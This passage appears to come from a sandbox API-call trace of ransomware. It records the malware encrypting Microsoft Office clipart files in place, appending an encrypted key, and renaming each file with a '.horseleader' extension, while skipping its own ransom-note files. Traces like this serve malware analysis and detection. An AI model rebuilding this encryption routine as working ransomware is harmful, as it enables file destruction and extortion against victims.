dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.359] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 67 [0254.359] StrStrW (lpFirst="DD01162_.WMF", lpSrch=".txt") returned 0x0 [0254.359] GetFileSizeEx (in: hFile=0x158, 
lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2300) returned 1 [0254.359] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x8fc, lpOverlapped=0x0) returned 1 [0254.361] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff704, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.361] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x8fc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x8fc, lpOverlapped=0x0) returned 1 [0254.362] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.362] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.362] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.362] CloseHandle (hObject=0x158) returned 1 [0254.362] GetProcessHeap () returned 0x780000 [0254.362] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.362] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.horseleader") returned 79 [0254.363] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\DD01162_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf.horseleader")) returned 1 [0254.364] GetProcessHeap () returned 0x780000 [0254.364] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.364] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8fc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01163_.WMF", cAlternateFileName="")) returned 1 [0254.364] lstrcmpiW (lpString1="DD01163_.WMF", lpString2="Windows") returned -1 [0254.364] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 67 [0254.364] StrStrIW (lpFirst="DD01163_.WMF", lpSrch=".horseleader") returned 0x0 [0254.364] lstrcmpW (lpString1="DD01163_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.364] lstrcmpW (lpString1="DD01163_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.364] lstrlenW (lpString=".testttjffg") returned 11 [0254.364] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.364] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.364] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.364] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" 
(normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.365] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 67 [0254.365] StrStrW (lpFirst="DD01163_.WMF", lpSrch=".txt") returned 0x0 [0254.365] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2300) returned 1 [0254.365] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x8fc, lpOverlapped=0x0) returned 1 [0254.368] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff704, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.368] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x8fc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x8fc, lpOverlapped=0x0) returned 1 [0254.368] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.368] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.368] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.368] CloseHandle (hObject=0x158) returned 1 [0254.368] GetProcessHeap () returned 0x780000 [0254.368] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.368] 
wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.horseleader") returned 79 [0254.369] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf.horseleader")) returned 1 [0254.370] GetProcessHeap () returned 0x780000 [0254.370] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.370] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x820, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01166_.WMF", cAlternateFileName="")) returned 1 [0254.370] lstrcmpiW (lpString1="DD01166_.WMF", lpString2="Windows") returned -1 [0254.370] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 67 [0254.370] StrStrIW (lpFirst="DD01166_.WMF", lpSrch=".horseleader") returned 0x0 [0254.370] lstrcmpW (lpString1="DD01166_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.370] lstrcmpW (lpString1="DD01166_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.370] lstrlenW (lpString=".testttjffg") returned 11 [0254.370] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF", lpSrch=".testttjffg") returned 0x0 
[0254.370] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.370] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.370] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.373] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 67 [0254.373] StrStrW (lpFirst="DD01166_.WMF", lpSrch=".txt") returned 0x0 [0254.373] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2080) returned 1 [0254.373] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x820, lpOverlapped=0x0) returned 1 [0254.375] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff7e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.375] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x820, lpOverlapped=0x0) returned 1 [0254.375] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.375] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 
[0254.376] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.376] CloseHandle (hObject=0x158) returned 1 [0254.376] GetProcessHeap () returned 0x780000 [0254.376] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.376] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.horseleader") returned 79 [0254.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf.horseleader")) returned 1 [0254.377] GetProcessHeap () returned 0x780000 [0254.377] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.377] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x820, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01167_.WMF", cAlternateFileName="")) returned 1 [0254.377] lstrcmpiW (lpString1="DD01167_.WMF", lpString2="Windows") returned -1 [0254.377] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 67 [0254.377] StrStrIW 
(lpFirst="DD01167_.WMF", lpSrch=".horseleader") returned 0x0 [0254.377] lstrcmpW (lpString1="DD01167_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.377] lstrcmpW (lpString1="DD01167_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.378] lstrlenW (lpString=".testttjffg") returned 11 [0254.378] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.378] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.378] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.378] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.378] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 67 [0254.378] StrStrW (lpFirst="DD01167_.WMF", lpSrch=".txt") returned 0x0 [0254.378] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2080) returned 1 [0254.379] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x820, lpOverlapped=0x0) returned 1 [0254.383] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff7e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.383] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x820, lpOverlapped=0x0) returned 1 [0254.383] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.383] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.383] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.383] CloseHandle (hObject=0x158) returned 1 [0254.384] GetProcessHeap () returned 0x780000 [0254.384] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.384] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.horseleader") returned 79 [0254.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf.horseleader")) returned 1 [0254.385] GetProcessHeap () returned 0x780000 [0254.385] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.385] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, 
ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7d4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01168_.WMF", cAlternateFileName="")) returned 1 [0254.385] lstrcmpiW (lpString1="DD01168_.WMF", lpString2="Windows") returned -1 [0254.385] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 67 [0254.385] StrStrIW (lpFirst="DD01168_.WMF", lpSrch=".horseleader") returned 0x0 [0254.385] lstrcmpW (lpString1="DD01168_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.385] lstrcmpW (lpString1="DD01168_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.385] lstrlenW (lpString=".testttjffg") returned 11 [0254.385] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.385] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.385] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.386] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.386] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 67 [0254.386] StrStrW (lpFirst="DD01168_.WMF", lpSrch=".txt") returned 0x0 [0254.386] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2004) returned 1 [0254.386] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x7d4, lpOverlapped=0x0) returned 1 [0254.389] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff82c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.389] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x7d4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x7d4, lpOverlapped=0x0) returned 1 [0254.390] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.391] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.391] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.391] CloseHandle (hObject=0x158) returned 1 [0254.391] GetProcessHeap () returned 0x780000 [0254.391] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.391] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.horseleader") returned 79 [0254.391] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf.horseleader")) returned 1 [0254.393] GetProcessHeap () returned 
0x780000 [0254.393] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.393] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7e4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01169_.WMF", cAlternateFileName="")) returned 1 [0254.393] lstrcmpiW (lpString1="DD01169_.WMF", lpString2="Windows") returned -1 [0254.393] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 67 [0254.393] StrStrIW (lpFirst="DD01169_.WMF", lpSrch=".horseleader") returned 0x0 [0254.393] lstrcmpW (lpString1="DD01169_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.393] lstrcmpW (lpString1="DD01169_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.393] lstrlenW (lpString=".testttjffg") returned 11 [0254.393] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.393] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.393] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.394] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.395] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 67 [0254.395] StrStrW (lpFirst="DD01169_.WMF", lpSrch=".txt") returned 0x0 [0254.395] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2020) returned 1 [0254.395] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x7e4, lpOverlapped=0x0) returned 1 [0254.410] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff81c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.410] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x7e4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x7e4, lpOverlapped=0x0) returned 1 [0254.410] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.411] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.411] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.411] CloseHandle (hObject=0x158) returned 1 [0254.411] GetProcessHeap () returned 0x780000 [0254.411] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.411] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.horseleader") returned 79 
